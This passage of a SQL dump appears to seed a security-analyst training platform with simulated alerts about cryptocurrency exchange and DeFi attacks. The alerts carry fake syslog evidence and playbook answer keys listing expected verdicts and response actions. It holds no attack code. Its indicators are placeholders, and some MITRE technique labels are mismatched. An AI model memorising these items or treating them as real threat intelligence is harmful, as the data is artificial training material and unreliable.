1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T02:15:30Z\\\",\\\"event_id\\\":\\\"crypto-access-00123\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.101\\\",\\\"compromised_key_hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"attacker_username\\\":\\\"attacker_user\\\",\\\"exploited_smart_contract\\\":\\\"0x9e564e1d1e334e123456790bcd1234567890abcd\\\",\\\"malicious_file\\\":\\\"malicious_keyfile.bin\\\",\\\"transaction_id\\\":\\\"tx1234567890abcdef\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.694Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T02:15:30Z\\\",\\\"event_id\\\":\\\"crypto-access-00123\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.101\\\",\\\"compromised_key_hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"attacker_username\\\":\\\"attacker_user\\\",\\\"exploited_smart_contract\\\":\\\"0x9e564e1d1e334e123456790bcd1234567890abcd\\\",\\\"malicious_file\\\":\\\"malicious_keyfile.bin\\\",\\\"transaction_id\\\":\\\"tx1234567890abcdef\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.694Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T02:15:30Z\\\",\\\"event_id\\\":\\\"crypto-access-00123\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.101\\\",\\\"compromised_key_hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"attacker_username\\\":\\\"attacker_user\\\",\\\"exploited_smart_contract\\\":\\\"0x9e564e1d1e334e123456790bcd1234567890abcd\\\",\\\"malicious_file\\\":\\\"malicious_keyfile.bin\\\",\\\"transaction_id\\\":\\\"tx1234567890abcdef\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.694Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T02:15:30Z\\\",\\\"event_id\\\":\\\"crypto-access-00123\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.101\\\",\\\"compromised_key_hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"attacker_username\\\":\\\"attacker_user\\\",\\\"exploited_smart_contract\\\":\\\"0x9e564e1d1e334e123456790bcd1234567890abcd\\\",\\\"malicious_file\\\":\\\"malicious_keyfile.bin\\\",\\\"transaction_id\\\":\\\"tx1234567890abcdef\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1002, 'Funds Exfiltration and Bug Bounty Offer', 'critical', 'Cryptocurrency exchange monitoring', 'An attacker successfully siphoned off $325 million from the exchange. They have proposed a $10 million bug bounty offer, indicating a negotiation strategy for vulnerability disclosure.', 'Exfiltration', 'T1048 - Exfiltration Over Alternative Protocol', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-05T14:23:45Z\",\"event_id\":\"evt-123456789\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"10.0.0.15\",\"username\":\"attacker_user\",\"transaction_id\":\"txn-987654321\",\"exfiltrated_amount\":325000000,\"proposed_bounty\":10000000,\"exfil_method\":\"http\",\"malware_hash\":\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\",\"filename\":\"exploit_script.sh\"}', '2026-01-17 03:45:24', '2026-02-16 17:50:03', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP involved in previous cyber attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal server used for transaction processing.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"attacker_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"User Directory\",\"verdict\":\"suspicious\",\"details\":\"Username not recognized in standard user lists.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malware used in financial exfiltration.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"exploit_script.sh\",\"is_critical\":true,\"osint_result\":{\"source\":\"Incident Response\",\"verdict\":\"malicious\",\"details\":\"Script used in multiple exfiltration incidents.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'DLP', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.696Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"event_id\\\":\\\"evt-123456789\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"attacker_user\\\",\\\"transaction_id\\\":\\\"txn-987654321\\\",\\\"exfiltrated_amount\\\":325000000,\\\"proposed_bounty\\\":10000000,\\\"exfil_method\\\":\\\"http\\\",\\\"malware_hash\\\":\\\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\\\",\\\"filename\\\":\\\"exploit_script.sh\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.696Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"event_id\\\":\\\"evt-123456789\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"attacker_user\\\",\\\"transaction_id\\\":\\\"txn-987654321\\\",\\\"exfiltrated_amount\\\":325000000,\\\"proposed_bounty\\\":10000000,\\\"exfil_method\\\":\\\"http\\\",\\\"malware_hash\\\":\\\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\\\",\\\"filename\\\":\\\"exploit_script.sh\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.696Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"event_id\\\":\\\"evt-123456789\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"attacker_user\\\",\\\"transaction_id\\\":\\\"txn-987654321\\\",\\\"exfiltrated_amount\\\":325000000,\\\"proposed_bounty\\\":10000000,\\\"exfil_method\\\":\\\"http\\\",\\\"malware_hash\\\":\\\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\\\",\\\"filename\\\":\\\"exploit_script.sh\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.696Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"event_id\\\":\\\"evt-123456789\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"attacker_user\\\",\\\"transaction_id\\\":\\\"txn-987654321\\\",\\\"exfiltrated_amount\\\":325000000,\\\"proposed_bounty\\\":10000000,\\\"exfil_method\\\":\\\"http\\\",\\\"malware_hash\\\":\\\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\\\",\\\"filename\\\":\\\"exploit_script.sh\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.696Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"event_id\\\":\\\"evt-123456789\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"attacker_user\\\",\\\"transaction_id\\\":\\\"txn-987654321\\\",\\\"exfiltrated_amount\\\":325000000,\\\"proposed_bounty\\\":10000000,\\\"exfil_method\\\":\\\"http\\\",\\\"malware_hash\\\":\\\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\\\",\\\"filename\\\":\\\"exploit_script.sh\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1003, 'Suspicious Cross-Chain Transaction Detected', 'high', 'Blockchain Transaction Monitor', 'An advanced attacker initiated a complex cross-chain transaction exploiting a vulnerability to gain initial access to the DeFi platform\'s financial ecosystem. The transaction was traced back to a known malicious IP address and included a suspicious hash indicating potential malware involvement.', 'Initial Access', 'T1078: Valid Accounts', 1, 'new', NULL, '{\"transaction_id\":\"0xabc123def456ghi789jkl000\",\"source_ip\":\"185.199.108.153\",\"destination_ip\":\"10.0.5.23\",\"origin_chain\":\"Ethereum\",\"destination_chain\":\"Binance Smart Chain\",\"transaction_amount\":\"5 ETH\",\"hash\":\"b1946ac92492d2347c6235b4d2611184\",\"user\":\"mal_user\",\"vulnerability_exploited\":\"Cross-chain smart contract vulnerability\",\"timestamp\":\"2023-10-15T14:48:00Z\"}', '2026-01-17 03:47:32', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.199.108.153\",\"is_critical\":true,\"osint_result\":{\"source\":\"Cyber Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known attacker IP associated with multiple DeFi platform attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash related to malware used in financial ecosystem breaches.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"10.0.5.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the affected DeFi platform.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"mal_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"DeFi User Database\",\"verdict\":\"suspicious\",\"details\":\"Username associated with unauthorized access attempts.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.697Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"transaction_id\\\":\\\"0xabc123def456ghi789jkl000\\\",\\\"source_ip\\\":\\\"185.199.108.153\\\",\\\"destination_ip\\\":\\\"10.0.5.23\\\",\\\"origin_chain\\\":\\\"Ethereum\\\",\\\"destination_chain\\\":\\\"Binance Smart Chain\\\",\\\"transaction_amount\\\":\\\"5 ETH\\\",\\\"hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"user\\\":\\\"mal_user\\\",\\\"vulnerability_exploited\\\":\\\"Cross-chain smart contract vulnerability\\\",\\\"timestamp\\\":\\\"2023-10-15T14:48:00Z\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.697Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"transaction_id\\\":\\\"0xabc123def456ghi789jkl000\\\",\\\"source_ip\\\":\\\"185.199.108.153\\\",\\\"destination_ip\\\":\\\"10.0.5.23\\\",\\\"origin_chain\\\":\\\"Ethereum\\\",\\\"destination_chain\\\":\\\"Binance Smart Chain\\\",\\\"transaction_amount\\\":\\\"5 ETH\\\",\\\"hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"user\\\":\\\"mal_user\\\",\\\"vulnerability_exploited\\\":\\\"Cross-chain smart contract vulnerability\\\",\\\"timestamp\\\":\\\"2023-10-15T14:48:00Z\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.697Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"transaction_id\\\":\\\"0xabc123def456ghi789jkl000\\\",\\\"source_ip\\\":\\\"185.199.108.153\\\",\\\"destination_ip\\\":\\\"10.0.5.23\\\",\\\"origin_chain\\\":\\\"Ethereum\\\",\\\"destination_chain\\\":\\\"Binance Smart Chain\\\",\\\"transaction_amount\\\":\\\"5 ETH\\\",\\\"hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"user\\\":\\\"mal_user\\\",\\\"vulnerability_exploited\\\":\\\"Cross-chain smart contract vulnerability\\\",\\\"timestamp\\\":\\\"2023-10-15T14:48:00Z\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.697Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"transaction_id\\\":\\\"0xabc123def456ghi789jkl000\\\",\\\"source_ip\\\":\\\"185.199.108.153\\\",\\\"destination_ip\\\":\\\"10.0.5.23\\\",\\\"origin_chain\\\":\\\"Ethereum\\\",\\\"destination_chain\\\":\\\"Binance Smart Chain\\\",\\\"transaction_amount\\\":\\\"5 ETH\\\",\\\"hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"user\\\":\\\"mal_user\\\",\\\"vulnerability_exploited\\\":\\\"Cross-chain smart contract vulnerability\\\",\\\"timestamp\\\":\\\"2023-10-15T14:48:00Z\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.697Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"transaction_id\\\":\\\"0xabc123def456ghi789jkl000\\\",\\\"source_ip\\\":\\\"185.199.108.153\\\",\\\"destination_ip\\\":\\\"10.0.5.23\\\",\\\"origin_chain\\\":\\\"Ethereum\\\",\\\"destination_chain\\\":\\\"Binance Smart Chain\\\",\\\"transaction_amount\\\":\\\"5 ETH\\\",\\\"hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"user\\\":\\\"mal_user\\\",\\\"vulnerability_exploited\\\":\\\"Cross-chain smart contract vulnerability\\\",\\\"timestamp\\\":\\\"2023-10-15T14:48:00Z\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1004, 'Exploitation of Cross-Chain Vulnerability', 'critical', 'DeFi Platform Logs', 'Using sophisticated techniques, the attacker manipulates the cross-chain transaction protocols, executing unauthorized transactions that begin to siphon funds.', 'Execution', 'T1059 - Command and Scripting Interpreter', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-24T14:32:45Z\",\"event_id\":\"123456789\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"10.1.2.3\",\"transaction_id\":\"tx_987654321\",\"user\":\"eth_user_007\",\"malicious_script\":\"cross_chain_exploit.sh\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"alert\":{\"name\":\"Unauthorized Cross-Chain Transaction\",\"type\":\"Execution\",\"severity\":\"Critical\"}}', '2026-01-17 03:47:32', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Associated with known APT campaigns targeting DeFi platforms.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.1.2.3\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of affected node.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"cross_chain_exploit.sh\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Database\",\"verdict\":\"malicious\",\"details\":\"Script used in exploitation of cross-chain vulnerabilities.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with exploit toolkit.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'SIEM', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.699Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-24T14:32:45Z\\\",\\\"event_id\\\":\\\"123456789\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.1.2.3\\\",\\\"transaction_id\\\":\\\"tx_987654321\\\",\\\"user\\\":\\\"eth_user_007\\\",\\\"malicious_script\\\":\\\"cross_chain_exploit.sh\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"alert\\\":{\\\"name\\\":\\\"Unauthorized Cross-Chain Transaction\\\",\\\"type\\\":\\\"Execution\\\",\\\"severity\\\":\\\"Critical\\\"}}\"},{\"timestamp\":\"2026-02-01T20:31:22.699Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-24T14:32:45Z\\\",\\\"event_id\\\":\\\"123456789\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.1.2.3\\\",\\\"transaction_id\\\":\\\"tx_987654321\\\",\\\"user\\\":\\\"eth_user_007\\\",\\\"malicious_script\\\":\\\"cross_chain_exploit.sh\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"alert\\\":{\\\"name\\\":\\\"Unauthorized Cross-Chain Transaction\\\",\\\"type\\\":\\\"Execution\\\",\\\"severity\\\":\\\"Critical\\\"}}\"},{\"timestamp\":\"2026-02-01T20:30:22.699Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-24T14:32:45Z\\\",\\\"event_id\\\":\\\"123456789\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.1.2.3\\\",\\\"transaction_id\\\":\\\"tx_987654321\\\",\\\"user\\\":\\\"eth_user_007\\\",\\\"malicious_script\\\":\\\"cross_chain_exploit.sh\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"alert\\\":{\\\"name\\\":\\\"Unauthorized Cross-Chain Transaction\\\",\\\"type\\\":\\\"Execution\\\",\\\"severity\\\":\\\"Critical\\\"}}\"},{\"timestamp\":\"2026-02-01T20:29:22.699Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-24T14:32:45Z\\\",\\\"event_id\\\":\\\"123456789\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.1.2.3\\\",\\\"transaction_id\\\":\\\"tx_987654321\\\",\\\"user\\\":\\\"eth_user_007\\\",\\\"malicious_script\\\":\\\"cross_chain_exploit.sh\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"alert\\\":{\\\"name\\\":\\\"Unauthorized Cross-Chain Transaction\\\",\\\"type\\\":\\\"Execution\\\",\\\"severity\\\":\\\"Critical\\\"}}\"},{\"timestamp\":\"2026-02-01T20:28:22.699Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-24T14:32:45Z\\\",\\\"event_id\\\":\\\"123456789\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.1.2.3\\\",\\\"transaction_id\\\":\\\"tx_987654321\\\",\\\"user\\\":\\\"eth_user_007\\\",\\\"malicious_script\\\":\\\"cross_chain_exploit.sh\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"alert\\\":{\\\"name\\\":\\\"Unauthorized Cross-Chain Transaction\\\",\\\"type\\\":\\\"Execution\\\",\\\"severity\\\":\\\"Critical\\\"}}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1005, 'Establishment of Persistence through Smart Contracts', 'high', 'Smart Contract Analysis', 'An attacker has embedded malicious smart contracts to maintain persistent access to the network. These contracts are designed to bypass security measures and facilitate ongoing unauthorized transactions. Advanced techniques were employed to obfuscate the malicious code within the blockchain.', 'Persistence', 'T1543.005 - Implant Internal Image - Container Orchestration', 1, 'new', NULL, '{\"timestamp\":\"2023-10-01T14:45:30Z\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.10\",\"malicious_contract_hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"contract_name\":\"EternalAccess.sol\",\"attacker_username\":\"contract_deployer\",\"detected_by\":\"Smart Contract Analysis Tool v2.7\",\"event_id\":\"SC-20231001-003\"}', '2026-01-17 03:47:32', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple blockchain-related attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host associated with the deployment of the malicious contract.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"Blockchain Security Analysis\",\"verdict\":\"malicious\",\"details\":\"Hash of the malicious smart contract used to maintain persistence.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"EternalAccess.sol\",\"is_critical\":true,\"osint_result\":{\"source\":\"Smart Contract Repository\",\"verdict\":\"malicious\",\"details\":\"Smart contract file designed to maintain unauthorized access.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.701Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:45:30Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"malicious_contract_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"contract_name\\\":\\\"EternalAccess.sol\\\",\\\"attacker_username\\\":\\\"contract_deployer\\\",\\\"detected_by\\\":\\\"Smart Contract Analysis Tool v2.7\\\",\\\"event_id\\\":\\\"SC-20231001-003\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.701Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:45:30Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"malicious_contract_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"contract_name\\\":\\\"EternalAccess.sol\\\",\\\"attacker_username\\\":\\\"contract_deployer\\\",\\\"detected_by\\\":\\\"Smart Contract Analysis Tool v2.7\\\",\\\"event_id\\\":\\\"SC-20231001-003\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.701Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:45:30Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"malicious_contract_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"contract_name\\\":\\\"EternalAccess.sol\\\",\\\"attacker_username\\\":\\\"contract_deployer\\\",\\\"detected_by\\\":\\\"Smart Contract Analysis Tool v2.7\\\",\\\"event_id\\\":\\\"SC-20231001-003\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.701Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:45:30Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"malicious_contract_hash\\\":\\\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\\\",\\\"contract_name\\\":\\\"EternalAccess.sol\\\",\\\"attacker_username\\\":\\\"contract_deployer\\\",\\\"detected_by\\\":\\\"Smart Contract Analysis Tool v2.7\\\",\\\"event_id\\\":\\\"SC-20231001-003\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.701Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 